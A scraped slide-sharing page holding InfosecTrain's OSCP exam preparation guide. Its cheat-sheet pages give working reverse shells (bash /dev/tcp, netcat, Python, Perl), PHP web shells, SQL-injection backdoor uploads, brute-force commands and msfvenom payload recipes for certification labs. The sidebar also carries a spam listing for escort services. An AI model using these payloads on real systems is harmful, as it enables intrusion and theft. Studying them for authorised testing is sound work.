Csa certification trainingInfosecTrain
 
Iso 22301 la training
Iso 22301 la trainingIso 22301 la training
Iso 22301 la trainingInfosecTrain
 
Iso 22301 la training
Iso 22301 la trainingIso 22301 la training
Iso 22301 la trainingInfosecTrain
 
Iso 22301 la training
Iso 22301 la trainingIso 22301 la training
Iso 22301 la trainingInfosecTrain
 
Iso 27001 lead implementer training
Iso 27001 lead implementer trainingIso 27001 lead implementer training
Iso 27001 lead implementer trainingInfosecTrain
 
Offensive cyber security engineer updated
Offensive cyber security engineer updatedOffensive cyber security engineer updated
Offensive cyber security engineer updatedInfosecTrain
 
SIEM evaluator guide for soc analyst
SIEM evaluator guide for soc analystSIEM evaluator guide for soc analyst
SIEM evaluator guide for soc analystInfosecTrain
 
Aws top 50 interview questions
Aws top 50 interview questionsAws top 50 interview questions
Aws top 50 interview questionsInfosecTrain
 
CISA Domain 3 - Information Systems Acquisition, Development and Implementation
CISA Domain 3 - Information Systems Acquisition, Development and ImplementationCISA Domain 3 - Information Systems Acquisition, Development and Implementation
CISA Domain 3 - Information Systems Acquisition, Development and ImplementationInfosecTrain
 
CISA Domain 4 Information Systems Operation | Infosectrain
CISA Domain 4 Information Systems Operation | InfosectrainCISA Domain 4 Information Systems Operation | Infosectrain
CISA Domain 4 Information Systems Operation | InfosectrainInfosecTrain
 
Information Security Analyst- Infosec train
Information Security Analyst- Infosec trainInformation Security Analyst- Infosec train
Information Security Analyst- Infosec trainInfosecTrain
 
CISA Domain- 1 - InfosecTrain
CISA Domain- 1 - InfosecTrainCISA Domain- 1 - InfosecTrain
CISA Domain- 1 - InfosecTrainInfosecTrain
 
AZ 500 Exam Preparation @ Infosec Train
AZ 500 Exam Preparation @ Infosec TrainAZ 500 Exam Preparation @ Infosec Train
AZ 500 Exam Preparation @ Infosec TrainInfosecTrain
 
Google Cloud Certifications @ Infosectrain
Google Cloud Certifications @ InfosectrainGoogle Cloud Certifications @ Infosectrain
Google Cloud Certifications @ InfosectrainInfosecTrain
 
How to prepare for AWS Security, Azure Security and Google Professional Cloud...
How to prepare for AWS Security, Azure Security and Google Professional Cloud...How to prepare for AWS Security, Azure Security and Google Professional Cloud...
How to prepare for AWS Security, Azure Security and Google Professional Cloud...InfosecTrain
 
OSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainOSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainInfosecTrain
 
How to prepare for Infosec domain's best certifications?
How to prepare for Infosec domain's best certifications?How to prepare for Infosec domain's best certifications?
How to prepare for Infosec domain's best certifications?InfosecTrain
 

Plus de InfosecTrain (18)

Csa certification training
Csa certification trainingCsa certification training
Csa certification training
 
Csa certification training
Csa certification trainingCsa certification training
Csa certification training
 
Iso 22301 la training
Iso 22301 la trainingIso 22301 la training
Iso 22301 la training
 
Iso 22301 la training
Iso 22301 la trainingIso 22301 la training
Iso 22301 la training
 
Iso 22301 la training
Iso 22301 la trainingIso 22301 la training
Iso 22301 la training
 
Iso 27001 lead implementer training
Iso 27001 lead implementer trainingIso 27001 lead implementer training
Iso 27001 lead implementer training
 
Offensive cyber security engineer updated
Offensive cyber security engineer updatedOffensive cyber security engineer updated
Offensive cyber security engineer updated
 
SIEM evaluator guide for soc analyst
SIEM evaluator guide for soc analystSIEM evaluator guide for soc analyst
SIEM evaluator guide for soc analyst
 
Aws top 50 interview questions
Aws top 50 interview questionsAws top 50 interview questions
Aws top 50 interview questions
 
CISA Domain 3 - Information Systems Acquisition, Development and Implementation
CISA Domain 3 - Information Systems Acquisition, Development and ImplementationCISA Domain 3 - Information Systems Acquisition, Development and Implementation
CISA Domain 3 - Information Systems Acquisition, Development and Implementation
 
CISA Domain 4 Information Systems Operation | Infosectrain
CISA Domain 4 Information Systems Operation | InfosectrainCISA Domain 4 Information Systems Operation | Infosectrain
CISA Domain 4 Information Systems Operation | Infosectrain
 
Information Security Analyst- Infosec train
Information Security Analyst- Infosec trainInformation Security Analyst- Infosec train
Information Security Analyst- Infosec train
 
CISA Domain- 1 - InfosecTrain
CISA Domain- 1 - InfosecTrainCISA Domain- 1 - InfosecTrain
CISA Domain- 1 - InfosecTrain
 
AZ 500 Exam Preparation @ Infosec Train
AZ 500 Exam Preparation @ Infosec TrainAZ 500 Exam Preparation @ Infosec Train
AZ 500 Exam Preparation @ Infosec Train
 
Google Cloud Certifications @ Infosectrain
Google Cloud Certifications @ InfosectrainGoogle Cloud Certifications @ Infosectrain
Google Cloud Certifications @ Infosectrain
 
How to prepare for AWS Security, Azure Security and Google Professional Cloud...
How to prepare for AWS Security, Azure Security and Google Professional Cloud...How to prepare for AWS Security, Azure Security and Google Professional Cloud...
How to prepare for AWS Security, Azure Security and Google Professional Cloud...
 
OSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainOSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ Infosectrain
 
How to prepare for Infosec domain's best certifications?
How to prepare for Infosec domain's best certifications?How to prepare for Infosec domain's best certifications?
How to prepare for Infosec domain's best certifications?
 

Dernier

Interactive Powerpoint_How to Master effective communication
Interactive Powerpoint_How to Master effective communicationInteractive Powerpoint_How to Master effective communication
Interactive Powerpoint_How to Master effective communicationnomboosow
 
Q4-W6-Restating Informational Text Grade 3
Q4-W6-Restating Informational Text Grade 3Q4-W6-Restating Informational Text Grade 3
Q4-W6-Restating Informational Text Grade 3JemimahLaneBuaron
 
microwave assisted reaction. General introduction
microwave assisted reaction. General introductionmicrowave assisted reaction. General introduction
microwave assisted reaction. General introductionMaksud Ahmed
 
Introduction to Nonprofit Accounting: The Basics
Introduction to Nonprofit Accounting: The BasicsIntroduction to Nonprofit Accounting: The Basics
Introduction to Nonprofit Accounting: The BasicsTechSoup
 
Activity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdfActivity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdfciinovamais
 
mini mental status format.docx
mini mental status format.docxmini mental status format.docx
mini mental status format.docxPoojaSen20
 
Sports & Fitness Value Added Course FY..
Sports & Fitness Value Added Course FY..Sports & Fitness Value Added Course FY..
Sports & Fitness Value Added Course FY..Disha Kariya
 
The Most Excellent Way | 1 Corinthians 13
The Most Excellent Way | 1 Corinthians 13The Most Excellent Way | 1 Corinthians 13
The Most Excellent Way | 1 Corinthians 13Steve Thomason
 
JAPAN: ORGANISATION OF PMDA, PHARMACEUTICAL LAWS & REGULATIONS, TYPES OF REGI...
JAPAN: ORGANISATION OF PMDA, PHARMACEUTICAL LAWS & REGULATIONS, TYPES OF REGI...JAPAN: ORGANISATION OF PMDA, PHARMACEUTICAL LAWS & REGULATIONS, TYPES OF REGI...
JAPAN: ORGANISATION OF PMDA, PHARMACEUTICAL LAWS & REGULATIONS, TYPES OF REGI...anjaliyadav012327
 
Russian Call Girls in Andheri Airport Mumbai WhatsApp 9167673311 💞 Full Nigh...
Russian Call Girls in Andheri Airport Mumbai WhatsApp 9167673311 💞 Full Nigh...Russian Call Girls in Andheri Airport Mumbai WhatsApp 9167673311 💞 Full Nigh...
Russian Call Girls in Andheri Airport Mumbai WhatsApp 9167673311 💞 Full Nigh...Pooja Nehwal
 
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...fonyou31
 
A Critique of the Proposed National Education Policy Reform
A Critique of the Proposed National Education Policy ReformA Critique of the Proposed National Education Policy Reform
A Critique of the Proposed National Education Policy ReformChameera Dedduwage
 
Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)eniolaolutunde
 
Nutritional Needs Presentation - HLTH 104
Nutritional Needs Presentation - HLTH 104Nutritional Needs Presentation - HLTH 104
Nutritional Needs Presentation - HLTH 104misteraugie
 
Measures of Central Tendency: Mean, Median and Mode
Measures of Central Tendency: Mean, Median and ModeMeasures of Central Tendency: Mean, Median and Mode
Measures of Central Tendency: Mean, Median and ModeThiyagu K
 
Z Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot GraphZ Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot GraphThiyagu K
 
Separation of Lanthanides/ Lanthanides and Actinides
Separation of Lanthanides/ Lanthanides and ActinidesSeparation of Lanthanides/ Lanthanides and Actinides
Separation of Lanthanides/ Lanthanides and ActinidesFatimaKhan178732
 

Dernier (20)

Interactive Powerpoint_How to Master effective communication
Interactive Powerpoint_How to Master effective communicationInteractive Powerpoint_How to Master effective communication
Interactive Powerpoint_How to Master effective communication
 
Q4-W6-Restating Informational Text Grade 3
Q4-W6-Restating Informational Text Grade 3Q4-W6-Restating Informational Text Grade 3
Q4-W6-Restating Informational Text Grade 3
 
microwave assisted reaction. General introduction
microwave assisted reaction. General introductionmicrowave assisted reaction. General introduction
microwave assisted reaction. General introduction
 
Introduction to Nonprofit Accounting: The Basics
Introduction to Nonprofit Accounting: The BasicsIntroduction to Nonprofit Accounting: The Basics
Introduction to Nonprofit Accounting: The Basics
 
INDIA QUIZ 2024 RLAC DELHI UNIVERSITY.pptx
INDIA QUIZ 2024 RLAC DELHI UNIVERSITY.pptxINDIA QUIZ 2024 RLAC DELHI UNIVERSITY.pptx
INDIA QUIZ 2024 RLAC DELHI UNIVERSITY.pptx
 
Activity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdfActivity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdf
 
Mattingly "AI & Prompt Design: The Basics of Prompt Design"
Mattingly "AI & Prompt Design: The Basics of Prompt Design"Mattingly "AI & Prompt Design: The Basics of Prompt Design"
Mattingly "AI & Prompt Design: The Basics of Prompt Design"
 
mini mental status format.docx
mini mental status format.docxmini mental status format.docx
mini mental status format.docx
 
Código Creativo y Arte de Software | Unidad 1
Código Creativo y Arte de Software | Unidad 1Código Creativo y Arte de Software | Unidad 1
Código Creativo y Arte de Software | Unidad 1
 
Sports & Fitness Value Added Course FY..
Sports & Fitness Value Added Course FY..Sports & Fitness Value Added Course FY..
Sports & Fitness Value Added Course FY..
 
The Most Excellent Way | 1 Corinthians 13
The Most Excellent Way | 1 Corinthians 13The Most Excellent Way | 1 Corinthians 13
The Most Excellent Way | 1 Corinthians 13
 
JAPAN: ORGANISATION OF PMDA, PHARMACEUTICAL LAWS & REGULATIONS, TYPES OF REGI...
JAPAN: ORGANISATION OF PMDA, PHARMACEUTICAL LAWS & REGULATIONS, TYPES OF REGI...JAPAN: ORGANISATION OF PMDA, PHARMACEUTICAL LAWS & REGULATIONS, TYPES OF REGI...
JAPAN: ORGANISATION OF PMDA, PHARMACEUTICAL LAWS & REGULATIONS, TYPES OF REGI...
 
Russian Call Girls in Andheri Airport Mumbai WhatsApp 9167673311 💞 Full Nigh...
Russian Call Girls in Andheri Airport Mumbai WhatsApp 9167673311 💞 Full Nigh...Russian Call Girls in Andheri Airport Mumbai WhatsApp 9167673311 💞 Full Nigh...
Russian Call Girls in Andheri Airport Mumbai WhatsApp 9167673311 💞 Full Nigh...
 
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
Ecosystem Interactions Class Discussion Presentation in Blue Green Lined Styl...
 
A Critique of the Proposed National Education Policy Reform
A Critique of the Proposed National Education Policy ReformA Critique of the Proposed National Education Policy Reform
A Critique of the Proposed National Education Policy Reform
 
Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)
 
Nutritional Needs Presentation - HLTH 104
Nutritional Needs Presentation - HLTH 104Nutritional Needs Presentation - HLTH 104
Nutritional Needs Presentation - HLTH 104
 
Measures of Central Tendency: Mean, Median and Mode
Measures of Central Tendency: Mean, Median and ModeMeasures of Central Tendency: Mean, Median and Mode
Measures of Central Tendency: Mean, Median and Mode
 
Z Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot GraphZ Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot Graph
 
Separation of Lanthanides/ Lanthanides and Actinides
Separation of Lanthanides/ Lanthanides and ActinidesSeparation of Lanthanides/ Lanthanides and Actinides
Separation of Lanthanides/ Lanthanides and Actinides
 

OSCP Preparation Guide @ Infosectrain

  • 1. OSCPPreparation Guide Phone : +91-97736-67874 Email : sales@infosectrain.com Web : www.infosectrain.com
  • 2. https://www.infosectrain.com/ Page 1 OSCP Preparation Guide  What is the offensive Security Certified Professional (OSCP)  Course Prerequisites  Overview of the Course  Lab Environment  Exam  Exam Preparation  Tips when you are taking the OSCP Exam  Resources and Websites recommended.
  • 3. https://www.infosectrain.com/ Page 2 What is OSCP ? The Offensive Security Certified In order to become certified Professional is one of the most you must complete the technical and most challenging Penetration Testing with certifications for information Kali Linux (PwK) course security professionals and pass a “24 hour” hands-on exam and you have 24 hours to write a report. Information Security Professionals who pass the exam and have obtained their OSCP can research the network (information gathering), identify any vulnerabilities, and successfully execute attacks.
  • 4. https://www.infosectrain.com/ Page 3 Course Prerequisites Before you decide to register for the course you need to have some experience in the following areas: 1.TCP/IP Networking Fundamentals  TCP/IP addressing and Subnetting  Understanding how network Traffic is sent & received  Types of protocols and services running on them. 2.Programming Languages  Bash  Python  Perl  Ruby 3. Operating Systems Knowledge  Linux (x86, 64-bit)  Windows (x86, 64-bit) 4.Note Taking Documentation is an important key when you are going through this course! Note Taking Tools:  Cherry Tree
  • 5. https://www.infosectrain.com/ Page 4  Microsoft OneNote  KeepNote Overview of course  Passive Information Gathering  Active Information Gathering  Vulnerability Scanning  Buffer Overflow  Win32 Buffer Overflow Exploitation  Linux Buffer Overflow Exploitation  Working with Exploits  Privilege Escalation  File Transfers  Client-Side Attacks  Web Application Attacks  Password Attacks  Port Redirection and Tunneling  The Metasploit Framework  Bypassing Antivirus Software Detailed Course Syllabus: https://www.offensive- security.com/documentation/penetration-testing-with-kali.pdf
  • 6. https://www.infosectrain.com/ Page 5 Lab Environment  You will be provided a VPN connection pack to access the lab.  The lab is broken into four networks: • Student Labs (Public Network) • IT Department • Development Network • Administrative Network
  • 7. https://www.infosectrain.com/ Page 6 Recommended Lab Setup  VMware Workstation or VMware Player  Recommended Virtual Machines:  Kali Linux  If you want to play with the custom image that is made for the course, you can find it here: https://images.offensive- security.com/pwk-kali-vm.7z  Windows 7 32bit/64bit  Software: Immunity Debugger for Windows 32bit/64bit Tips when you are inside PWK network  Enumerate Enumerate Enumerate!  Understand the purpose of the system  Document EVERYTHING!  Track your hours  Do NOT skip the lab exercises  Use the reverts
  • 8. https://www.infosectrain.com/ Page 7 The exam  23 hours and 45 minsYou will have a total of for the exam.  proctoredYou will be during your exam. Webcam and screen sharing software are required.  5 target systemsThe exam will consist of that are vulnerable and can be compromised. You will need a minimum of 70 points or higher to pass.  If you believe you have enough points you will have another 24 hours to write your report.  An extra 5 points will be given if you are able to complete the lab report and the course exercises
  • 9. https://www.infosectrain.com/ Page 8 Exam Restrictions You cannot use any of the following on the exam:  Spoofing (IP, ARP, DNS, NBNS, etc)  Commercial tools or services (Metasploit Pro, Burp Pro, etc.)  Automatic exploitation tools (e.g, browser_autopwn, SQLmap, SQLninja, jsql etc.)  Mass vulnerability scanners (e.g. Nessus, NeXpose, OpenVAS, Core Impact, SAINT, etc.)
  • 10. https://www.infosectrain.com/ Page 9 Preparing for the Exam When you feel that you are comfortable to take the exam, schedule it three to four weeks in advance Once you book a time slot to take your exam you should start thinking about the following:  Complete the lab report and class exercises to get the extra 5 points.  Read the guideline requirements before you take your exam.  Have an area or space that you will not be distracted in when you take your exam.  Do not forget to eat and drink.  Prepare your cheat sheets, notes, tools, and exploits.  Make sure you have your system set up and ready for the exam. SNAPSHOTS!  Start working on your exam report. Have a draft ready.
  • 11. https://www.infosectrain.com/ Page 10 Hands on machines to Prepare for OSCP OSCP-Like VMs on Vulnhub and Hackthebox: http://tiny.cc/OSCP_PREP Prepare for OSCP on HTB with IppSec: https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA Resources to Prepare Enumeration Enumeration is the most important thing you can do, where you find yourself hitting a wall, 90% of the time it will be because you haven’t done enough enumeration. Below are commands which are helpful while you are in the lab: Nmap Quick TCP Scan nmap -sC -sV -vv -oA quick target
  • 12. https://www.infosectrain.com/ Page 11 Quick UDP Scan nmap -sU -sV -vv -oA quick_udp target Full TCP Scan nmap -sC -sV -p- -vv -oA full target Port knock for x in 7000 8000 9000; do nmap -Pn --host_timeout 201 --max- retries 0 -p $x target; done Web Scanning Gobuster quick directory busting gobuster -u target -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux Gobuster search with file extension gobuster -u target -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux -x .txt,.php Nikto web server scan nikto -h target Wordpress scan wpscan -u target/wp/ Port Checking
  • 13. https://www.infosectrain.com/ Page 12 Netcat banner grab nc -v target port Telnet banner grab telnet target port SMB SMB Vulnerability Scan nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06- 025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln- ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse target SMB Users & Shares Scan nmap -p 445 -vv --script=smb-enum-shares.nse,smb-enum-users.nse target Enum4linux enum4linux -a target Null connect rpcclient -U "" target Connect to SMB share smbclient //MOUNT/share SNMP SNMP enumeration snmp-check target Reverse Shells Bash shell
  • 14. https://www.infosectrain.com/ Page 13 bash -i >& /dev/tcp/target/4443 0>&1 Netcat Linux nc -e /bin/sh target 4443 Netcat Windows nc -e cmd.exe target 4443 Python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_ STREAM);s.connect(("target",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","- i"]);' Perl perl -e 'use Socket;$i="target";$p=4443;socket(S,PF_INET,SOCK_STREAM,getproto byname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN ,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' Remote Desktop Remote Desktop for windows with share and 85% screen rdesktop -u username -p password -g 85% -r disk:share=/root/ target PHP PHP command injection from GET Request <?php echo system($_GET["cmd"]);?> #Alternative <?php echo shell_exec($_GET["cmd"]);?> Powershell
  • 15. https://www.infosectrain.com/ Page 14 Non-interactive execute powershell file powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive - NoProfile -File file.ps1 SSH Tunneling / Pivoting shuttle sshuttle -vvr user@target 10.1.1.0/24 Local port forwarding ssh <gateway> -L <local port to listen>:<remote host>:<remote port> Remote port forwarding ssh <gateway> -R <remote port to bind>:<local host>:<local port> Dynamic port forwarding ssh -D <local proxy port> -p <remote port> <target> Plink local port forwarding plink -l root -pw pass -R 3389:<localhost>:3389 <remote host> SQL Injection # sqlmap crawl sqlmap -u http://target --crawl=1 # sqlmap dump database sqlmap -u http://target --dbms=mysql --dump # sqlmap shell sqlmap -u http://target --dbms=mysql --os-shell Upload php command injection file union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php' Load file
  • 16. https://www.infosectrain.com/ Page 15 union all select 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6 Bypasses ' or 1=1 LIMIT 1 -- ' or 1=1 LIMIT 1 -- - ' or 1=1 LIMIT 1# 'or 1# ' or 1=1 -- ' or 1=1 -- - Brute force John the Ripper shadow file $ unshadow passwd shadow > unshadow.db $ john unshadow.db # Hashcat SHA512 $6$ shadow file hashcat -m 1800 -a 0 hash.txt rockyou.txt --username #Hashcat MD5 $1$ shadow file hashcat -m 500 -a 0 hash.txt rockyou.txt --username # Hashcat MD5 Apache webdav file hashcat -m 1600 -a 0 hash.txt rockyou.txt # Hashcat SHA1 hashcat -m 100 -a 0 hash.txt rockyou.txt --force # Hashcat Wordpress hashcat -m 400 -a 0 --remove hash.txt rockyou.txt
  • 17. https://www.infosectrain.com/ Page 16 RDP user with password list ncrack -vv --user offsec -P passwords rdp://target SSH user with password list hydra -l user -P pass.txt -t 10 target ssh -s 22 FTP user with password list medusa -h target -u user -P passwords.txt -M ftp MSFVenom Payloads # PHP reverse shell msfvenom -p php/meterpreter/reverse_tcp LHOST=target LPORT=4443 -f raw -o shell.php # Java WAR reverse shell msfvenom -p java/shell_reverse_tcp LHOST=target LPORT=4443 -f war -o shell.war # Linux bind shell msfvenom -p linux/x86/shell_bind_tcp LPORT=4443 -f c -b "x00x0ax0dx20" -e x86/shikata_ga_nai # Linux FreeBSD reverse shell msfvenom -p bsd/x64/shell_reverse_tcp LHOST=target LPORT=4443 - f elf -o shell.elf # Linux C reverse shell msfvenom -p linux/x86/shell_reverse_tcp LHOST=target LPORT=4443 -e x86/shikata_ga_nai -f c # Windows non staged reverse shell
  • 18. https://www.infosectrain.com/ Page 17 msfvenom -p windows/shell_reverse_tcp LHOST=target LPORT=4443 - e x86/shikata_ga_nai -f exe -o non_staged.exe # Windows Staged (Meterpreter) reverse shell msfvenom -p windows/meterpreter/reverse_tcp LHOST=target LPORT=4443 -e x86/shikata_ga_nai -f exe -o meterpreter.exe # Windows Python reverse shell msfvenom -p windows/shell_reverse_tcp LHOST=target LPORT=4443 EXITFUNC=thread -f python -o shell.py # Windows ASP reverse shell msfvenom -p windows/shell_reverse_tcp LHOST=target LPORT=4443 - f asp -e x86/shikata_ga_nai -o shell.asp # Windows ASPX reverse shell msfvenom -f aspx -p windows/shell_reverse_tcp LHOST=target LPORT=4443 -e x86/shikata_ga_nai -o shell.aspx # Windows JavaScript reverse shell with nops msfvenom -p windows/shell_reverse_tcp LHOST=target LPORT=4443 - f js_le -e generic/none -n 18 # Windows Powershell reverse shell msfvenom -p windows/shell_reverse_tcp LHOST=target LPORT=4443 - e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1 # Windows reverse shell excluding bad characters
  • 19. https://www.infosectrain.com/ Page 18 msfvenom -p windows/shell_reverse_tcp -a x86 LHOST=target LPORT=4443 EXITFUNC=thread -f c -b "x00x04" -e x86/shikata_ga_nai # Windows x64 bit reverse shell msfvenom -p windows/x64/shell_reverse_tcp LHOST=target LPORT=4443 -f exe -o shell.exe # Windows reverse shell embedded into plink msfvenom -p windows/shell_reverse_tcp LHOST=target LPORT=4443 - f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows- binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe Interactive Shell Upgrading to a fully interactive TTY using Python # Enter while in reverse shell $ python -c 'import pty; pty.spawn("/bin/bash")' Ctrl-Z # In Kali $ stty raw -echo $ fg # In reverse shell $ reset $ export SHELL=bash $ export TERM=xterm-256color $ stty rows <num> columns <cols>
  • 20. https://www.infosectrain.com/ Page 19 File Transfers HTTP The most common file transfer method. # In Kali python -m SimpleHTTPServer 80 # In reverse shell - Linux wget target/file # In reverse shell - Windows powershell -c "(new-object System.Net.WebClient).DownloadFile('http://target/file.exe','C:Users userDesktopfile.exe')" FTP This process can be mundane, a quick tip would be to be to name the filename as ‘file’ on your kali machine so that you don’t have to re-write the script multiple names, you can then rename the file on windows. # In Kali python -m pyftpdlib -p 21 -w # In reverse shell echo open target > ftp.txt echo USER anonymous >> ftp.txt echo ftp >> ftp.txt echo bin >> ftp.txt echo GET file >> ftp.txt echo bye >> ftp.txt
  • 21. https://www.infosectrain.com/ Page 20 # Execute ftp -v -n -s:ftp.txt TFTP Generic. # In Kali atftpd --daemon --port 69 /tftp # In reverse shell tftp -i target GET nc.exe
  • 22. https://www.infosectrain.com/ Page 21 Privilege Escalation: g0tmi1k Linux Priv Esc fuzzysecurity Windows Priv Esc sploitspren Windows Priv Esc togie6 Windows Priv Esc Guide Kernel Exploits: abatchy17’s Windows Exploits lucyoa’s kernel exploits Buffer Overflows: CorleanSeries: Part 1: https://www.corelan.be/index.php/2009/07/19/exploit-writing- tutorial-part-1-stack-based-overflows/ Part 2: https://www.corelan.be/index.php/2009/07/23/writing-buffer- overflow-exploits-a-quick-and-basic-tutorial-part-2/ Scripts: LinuxPrivChecker LinEnum PowerUp